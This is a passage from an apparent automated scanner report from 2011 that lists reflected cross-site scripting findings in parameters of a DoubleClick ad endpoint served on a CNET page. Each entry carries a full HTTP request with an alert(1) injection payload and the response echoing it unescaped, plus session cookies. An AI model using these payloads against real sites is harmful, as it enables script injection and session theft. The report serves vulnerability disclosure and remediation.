D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3a4884'-alert(1)-'1fd9fbb2e3b&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://
...[SNIP]...

3.123. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [e parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd276"-alert(1)-"9e7d663adcd was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3dd276"-alert(1)-"9e7d663adcd&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54539

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3dd276"-alert(1)-"9e7d663adcd&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/";

...[SNIP]...

3.124. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [epartner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35a62"-alert(1)-"491575274f was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=35a62"-alert(1)-"491575274f&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54538

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=35a62"-alert(1)-"491575274f&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/";
this.clickN = "0";
this.type = type;

...[SNIP]...

3.125. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [epartner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97230'-alert(1)-'d278434a2 was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=97230'-alert(1)-'d278434a2&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:15 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54534

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=97230'-alert(1)-'d278434a2&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://www.blackberry.com">
...[SNIP]...

3.126. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [event parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42d51"-alert(1)-"68a22fe282e was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=42d51"-alert(1)-"68a22fe282e HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 54533
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 23:22:15 GMT
Expires: Wed, 27 Apr 2011 23:22:15 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=42d51"-alert(1)-"68a22fe282e";
this.clickN = "0";
this.type = type;
this.uniqueId = plcrInfo_1303848426617.uniqueId;
this.thirdPartyImpUrl = "";
this
...[SNIP]...

3.127. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [event parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86835'-alert(1)-'acccea5abcb was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=86835'-alert(1)-'acccea5abcb HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 54530
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 23:22:16 GMT
Expires: Wed, 27 Apr 2011 23:22:16 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=86835'-alert(1)-'acccea5abcbhttp://www.blackberry.com">
...[SNIP]...

3.128. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b1c7"-alert(1)-"3bd2dbe41e8 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn1b1c7"-alert(1)-"3bd2dbe41e8&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
1-0%3B0%3B61499020%3B4307-300/250%3B41885699/41903486/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn1b1c7"-alert(1)-"3bd2dbe41e8&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.2
...[SNIP]...

3.129. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f446'-alert(1)-'ad85bf69864 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn1f446'-alert(1)-'ad85bf69864&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
1-0%3B0%3B61499020%3B4307-300/250%3B41885699/41903486/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn1f446'-alert(1)-'ad85bf69864&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.2
...[SNIP]...

3.130. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3d52"-alert(1)-"8cd047b7e6e was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_USb3d52"-alert(1)-"8cd047b7e6e&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
20%3B4307-300/250%3B41885699/41903486/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_USb3d52"-alert(1)-"8cd047b7e6e&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJ
...[SNIP]...

3.131. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9916'-alert(1)-'a98a38d25af was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_USc9916'-alert(1)-'a98a38d25af&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
20%3B4307-300/250%3B41885699/41903486/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_USc9916'-alert(1)-'a98a38d25af&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJ
...[SNIP]...

3.132. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [nd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3887'-alert(1)-'475192829dd was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686f3887'-alert(1)-'475192829dd&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
